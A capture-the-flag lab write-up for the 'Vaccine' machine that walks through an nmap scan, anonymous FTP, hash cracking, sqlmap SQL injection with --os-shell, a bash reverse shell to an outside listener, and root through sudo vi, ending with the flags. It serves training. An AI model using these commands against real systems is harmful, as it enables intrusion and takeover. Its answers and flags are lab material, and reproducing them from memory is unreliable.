# Vaccine
## Initial Scan
```nmap
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
```
## Task 1
Besides SSH and HTTP, what other service is hosted on this box?
Answer: FTP
## Task 2
This service can be configured to allow login with any password for specific username. What is that username?
Answer: anonymous
## Task 3
What is the name of the file downloaded over this service?
```
ftp 10.129.248.153
```
Answer: backup.zip
## Task 4
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
Answer: zip2john
## Task 5
What is the password for the admin user on the website?
backup.zip password:`41852963`
Looking at index.html
Put the hash in a file and crack the hash with hashcat
```bash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
```
Answer:qwerty789
## Task 6
What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at `sqlmap -h`
Answer: --os-shell
## Task 7
What program can the postgres user run as root using sudo?
Get the cookie from the Website.
```bash
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
```
We get our shell.
Start the listener and run
```
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
```
Answer: vi
## Task 8
Submit user flag
Answer: ec9b13ca4d6229cd5cc1e09980965bf7
## Task 9
Submit root flag
Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see
`user=postgres password=P@s5w0rd!`
Looking at various options on [GTBOBins](https://gtfobins.github.io/gtfobins/vi/#sudo)
Open a file we could only do as sudo vi
```
type :shell=/bin/sh
ENTER
:shell
ENTER
```
Answer: dd6e058e814260bc70e9bbdef2715849
